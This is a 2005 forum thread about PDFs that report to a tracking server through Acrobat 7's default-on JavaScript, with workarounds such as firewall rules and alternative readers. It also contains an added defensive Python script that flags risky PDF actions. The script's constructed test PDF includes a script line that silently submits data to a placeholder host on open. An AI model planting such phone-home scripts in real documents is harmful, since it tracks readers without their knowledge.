A New Approach
April 13, 2005 9:06 AM

Unexpected Features in Acrobat 7: A company called Remote Approach offers a feature to PDF authors to allow them to track the dissemination of their documents. Linux Weekly News reports, "After doing a little research, we found that Adobe's Reader was connecting to http://www.remoteapproach.com/remoteapproach/logging.asp each time we opened the document."
posted by knave (35 comments total)
 
To those who don't want this: your software firewall can prevent connections to this site, or you can add a line to your "hosts" file:

127.0.0.1 remoteapproach.com
posted by orthogonality at 9:15 AM on April 13, 2005


Or...jump off the eternal wheel of upgrades.
posted by gimonca at 9:21 AM on April 13, 2005


Adobe products... now with more spyware, because you know you want it!
posted by clevershark at 9:26 AM on April 13, 2005


Why do they always have to fuck up a perfectly good thing?
posted by fungible at 9:27 AM on April 13, 2005


RTFA.

What many Linux users may not have realized, since Adobe did not release an Acrobat Reader 6.x for Linux, is that Adobe has added JavaScript support to PDF and the official Acrobat readers since Acrobat 6.x. For those interested in the JavaScript support and its abilities in Acrobat, see Adobe's scripting reference or scripting guide. (Both are PDFs, of course.)

By default, Adobe Reader 7 turns on JavaScript, so the "tagged" document is able to "phone home" without the user's awareness. Turning off JavaScript disables the document's code, and prevents Remote Approach (or any other entity) from tracking views of the document. No doubt, Remote Approach is using features that would normally be used to submit information from a PDF form.


I'm not thrilled at all about Adobe going the Microsoft route with scripting available for anyone who wants to add malicious code to a pdf document. That's bad enough without hyperbole about spyware confusing the actual issue.
posted by ursus_comiter at 9:44 AM on April 13, 2005
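
As an added example (not part of the thread or of the quoted article), a small triage script for the behaviour quoted above: it scans a PDF's raw bytes for the name tokens that mark JavaScript, open-time actions and form submission, and lists any URLs it finds. The two sample documents and the host `tracker.example` are constructed, and content inside compressed streams is not inspected.

```python
import re

# PDF name tokens that mark active content or network-capable actions.
RISKY = {"JS", "JavaScript", "OpenAction", "AA", "SubmitForm", "URI", "Launch"}
NETWORK = {"JS", "JavaScript", "SubmitForm", "URI"}

# A PDF name is "/" followed by regular characters (no whitespace or delimiters).
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")

def decode_name(raw: bytes) -> str:
    """Undo #XX hex escapes so /J#61vaScript is read as /JavaScript."""
    plain = re.sub(rb"#([0-9A-Fa-f]{2})",
                   lambda m: bytes([int(m.group(1), 16)]), raw)
    return plain.decode("latin-1")

def triage_pdf(data: bytes) -> dict:
    """Count risky names and collect URLs visible in the raw bytes."""
    names = {}
    for match in NAME_RE.finditer(data):
        name = decode_name(match.group(1))
        if name in RISKY:
            names[name] = names.get(name, 0) + 1
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(data)})
    return {
        "names": names,
        "urls": urls,
        "runs_on_open": "OpenAction" in names or "AA" in names,
        "may_phone_home": bool(urls) and any(n in names for n in NETWORK),
    }

# Constructed sample: a catalog whose open action is a script that posts to a URL.
SAMPLE_TAGGED = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
3 0 obj
<< /S /J#61vaScript /JS (this.submitForm("http://tracker.example/log");) >>
endobj
"""
# Constructed sample: a catalog with no actions at all.
SAMPLE_PLAIN = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
"""

if __name__ == "__main__":
    for label, doc in (("tagged", SAMPLE_TAGGED), ("plain", SAMPLE_PLAIN)):
        print(label, triage_pdf(doc))
```

A clean result only means nothing was visible in the uncompressed bytes; a flagged file is a candidate for opening with JavaScript disabled or in a viewer without scripting support.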


Is this a feature in any way related to Adobe's actions, or is it a 3rd-party plugin? Seems similar to blaming Microsoft for allowing images in emails (which allow the same sort of tracking).
posted by thedevildancedlightly at 9:45 AM on April 13, 2005


See ursus_comiter for my thoughts - this isn't a problem with Adobe, but with the nature of the interactive internet.
posted by thedevildancedlightly at 9:46 AM on April 13, 2005


Why do they always have to fuck up a perfectly good thing?

People can get schizophrenic when it comes to dealing with their web users/customers.

For instance, they hate spam but won't see anything wrong about mass-mailing potential customers. Others will never give their own private information to a website but will still insist on collecting private data from their visitors. They can see why it's bad for them but for some reason are unable to understand that their users/customers feel the same. Every time I discuss this matter with them I realize that they just don't connect the dots.

- "I want visitors to give their name, address, phone number and email so that I know who they are, and it must be mandatory"
- "Have you ever visited a website where this was mandatory? Would you like it?"
- "Uh, no"

Pet peeve: academics who are using other academics' data and figures (found on the internet) for their Powerpoint presentations and who keep asking me how to prevent their own on-line data and figures from being "stolen", for instance by making PDF printing impossible.

I guess these are potential customers for a service such as Remote Approach.
posted by elgilito at 10:16 AM on April 13, 2005


another good reason to use Preview in Mac OSX to view PDFs
posted by slogger at 10:21 AM on April 13, 2005


I uninstalled Adobe Reader on every machine I use and switched to this tiny, free application. I've opened dozens of PDFs from different sources since then and never had a problem with them, and it loads in an instant.
posted by nev at 10:23 AM on April 13, 2005


(That's Windows-only, though.)
posted by nev at 10:24 AM on April 13, 2005


nev writes "I uninstalled Adobe Reader on every machine I use and switched to this tiny, free application."

I haven't tried this yet, but it's got the best EULA I've ever seen. Even better than the GPL EULAs, if not in terms of what it allows, in its simplicity.
posted by orthogonality at 10:27 AM on April 13, 2005


This is exactly what my company has been looking for. Thanks a bunch for making me the star today!
posted by fenriq at 10:31 AM on April 13, 2005


Sigh....

They added Javascript people... Which in a perfect world is really a pretty cool addition.

The ability to make look alike paper forms interactive, so that a user can fill them out, get some validation, and then print them all from a locally saved document is a nice feature for a lot of folks.

So yes, some douchebag took those capabilities and built a webbug with it.

Welcome to world of tomorrow.
posted by PissOnYourParade at 10:37 AM on April 13, 2005


Dang it Adobe, as if the size-bloat of Acrobat wasn't bad enough, this sucks. Still, there seems to be enough goodness in Tiger's improved PDF support to keep me happy for a while. I just want the 29th April to be here now!
posted by TheDonF at 10:38 AM on April 13, 2005


Nice, elegant workaround orthogonality.
posted by caddis at 10:42 AM on April 13, 2005


nev-thanks for that.
posted by OmieWise at 10:51 AM on April 13, 2005


There's also an alternative to PDF, it's called DJVU originally developed by AT&T Research Labs (cool techies over there) now owned by a company (sending a safety message to corporate) but decoder/reader is open source. There's no excuse for "there's no alternative" choosing of PDF anymore, sorry.

Yes, you have to work !!
posted by elpapacito at 11:16 AM on April 13, 2005


Tempest in a teapot.

Folks, this isn't Adobe's fault. All they did was implement a subset of Javascript to allow greater interactivity on their forms (which, IMHO, is a good thing). This "tracking" feature is not implemented by Adobe, but by a 3rd Party who wants you to upload your documents to them so they can "modify" them by adding a "phone home" Javascript and then send them back to you. From a technical standpoint, this should be simple to implement via an onOpen() (or whatever the actual method is).

Blaming Adobe for this is like blaming W3C for script vulnerabilities in Mozilla.

The issue here, IMHO, is that a company is asking people to pay them for the right to modify their documents and track its usage.
posted by mkultra at 11:20 AM on April 13, 2005


Blaming Adobe for this is like blaming W3C for script vulnerabilities in Mozilla.

Actually, it's like blaming Mozilla for script vulnerabilities in Mozilla.
posted by grouse at 12:02 PM on April 13, 2005


Why do they always have to fuck up a perfectly good thing?

Personally, I've never liked Acrobat, and this is just another nail in the coffin (note: the coffin has a lot of nails already). We come from two different worlds, my friend.
posted by Hildago at 12:05 PM on April 13, 2005


Actually, it's like blaming Mozilla for script vulnerabilities in Mozilla.

OK, bad analogy, but I still fail to see how this is due to some evil on Adobe's part, or even some tragic flaw in the software.
posted by mkultra at 12:11 PM on April 13, 2005


I like the foxit software, but couldn't print from TurboTax Online with it and had to install Adobe Reader anyway :/
posted by Foosnark at 12:35 PM on April 13, 2005


mkultra because people (OK I) don't expect a document viewer to have scripting capabilities. And I don't expect a document reader to be a web browser unless it's advertised that way. This is going to be quite the support paradigm shift if this is easily exploitable just like when mail went from safe -> safe as long as you didn't open -> even just previewing the wrong message can totally hose your system if you haven't patched since the last exploit.
posted by Mitheral at 1:06 PM on April 13, 2005


Geez and when you turn scripting off acrobat asks you to turn it back on at every exit, warning that the document may not be rendered correctly even if you didn't have any document open. Now that's evil.
posted by Mitheral at 1:15 PM on April 13, 2005


See ursus_comiter for my thoughts - this isn't a problem with Adobe, but with the nature of the interactive internet.

RTFC. The problem appears to be that Adobe has decided to add an insecure default setting for Javascript in PDF documents, as ursus_comiter has pointed out.
posted by clevershark at 1:22 PM on April 13, 2005


Mitheral writes "Geez and when you turn scripting off acrobat asks you to turn it back on at every exit, warning that the document may not be rendered correctly even if you didn't have any document open. Now that's evil."

There's a windows patch that gets rid of the box asking you to turn javascript back on. I saw it on Slashdot, I think, or of course you can google for it.
posted by orthogonality at 1:25 PM on April 13, 2005


Anyone know if Adobe Reader on OS/X uses Apple's Webkit for HTTP requests? Or goes via the standard defined proxy server?

(If so: Adobe, meet privoxy.)
posted by cstross at 2:09 PM on April 13, 2005


Big big thanks nev, this pdf reader is a gem. It loads and runs several magnitudes faster than the bloated original, I stopped at its 6th version, but the loading time of it was already nearing grotesque, even longer than Photoshop CS behemoth. I can even remember giving up on the loading of a pdf, killing the task.
A loss for Adobe, a win for the PDF format.
posted by denpo at 2:17 PM on April 13, 2005


Folks, this isn't Adobe's fault. All they did was implement a subset of Javascript to allow greater interactivity on their forms (which, IMHO, is a good thing).

Are you serious? You honestly don't see how allowing PDFs to do things like connect to remote servers is boneheaded? Do you think a PDF should be able to read and write arbitrary files, too?

They could have easily designed it to pop up a window asking, "Do you want to allow this document to connect to blah.blah.com?" once per document by default, with a preference option to give a default answer rather than ask the question every time. I would have thought anyone who was alive and had access to the Internet in 2005 would understand the need for this.

It absolutely is incumbent upon application programmers to anticipate these sorts of obvious problems with any new functionality that is added. I like to imagine that someone at Adobe raised this issue and suggested something more-or-less like what I suggested, but was shot down by someone in marketing.
posted by dreish at 2:27 PM on April 13, 2005


Thanks to both orthogonality and nev. This is a terribly useful discussion.
posted by ontic at 2:45 PM on April 13, 2005


orthogonality's approach only works as long as (a) Remote Approach uses that hostname exclusively (instead of, say, pdf.remoteapproach.com) and (b) no one else whips up a script in their PDFs that does the same thing to their servers. The comments to the original article discuss this in great detail. It's a wallpaper fix that doesn't solve the real problem (sorry).

A better approach (in Linux) is to use iptables to deny outbound connections from acroread. Don't know how you would do such a thing in Windows.
posted by elvolio at 4:22 PM on April 13, 2005


elvolio writes "A better approach (in Linux) is to use iptables to deny outbound connections from acroread. Don't know how you would do such a thing in Windows."

elvolio is absolutely right, the host tables approach is brittle.

That's why I mentioned software firewalls first ;)

Basically, with a windows software firewall, you can deny outbound connections from acroread, just as elvolio suggests doing under linux.

For instance, my software firewall (kerio -- highly recommended and free for personal use) is set to ask me on all outbound connections except for my HTML proxy, and I specifically disallow outbound connections from my mail reader to anywhere except my mail server, and only then on ports 25 and 110. This means that if I get spam with webbugs (basically any image that isn't included in the email itself) those are not loaded, so the spammer doesn't learn I got the message at all.

So yes, deny outbound connection for acroread, but do it by only allowing outbound connections where those connections are actually doing you some good, and deny (or have the software firewall ask permission for) all others.

(I have no idea, for instance, why Microsoft's mouse driver software likes to "phone home" every week or so, but I also know that it doesn't get to complete that connection from my machine.)
posted by orthogonality at 4:40 PM on April 13, 2005


dreish- That's true, it ought to have a permission box. And I'm certainly with you that this lame attempt at "DRM" is pretty horrendous. But, the ability to deliver an offline interactive form that can, in turn, deliver results to a centralized database is still, IMHO, a good thing. What I've found about Adobe's "advanced" (read: non-standard) PDF features is that they tend to degrade nicely, allowing other PDF display engines to still render the static content correctly, only without the bells and whistles.
posted by mkultra at 6:35 PM on April 13, 2005


The FOXIT thing just loads heaps faster than Acrobloat. That alone is worth the change, never mind the javascript thing...... Woot!
posted by Merlin at 12:44 AM on April 14, 2005

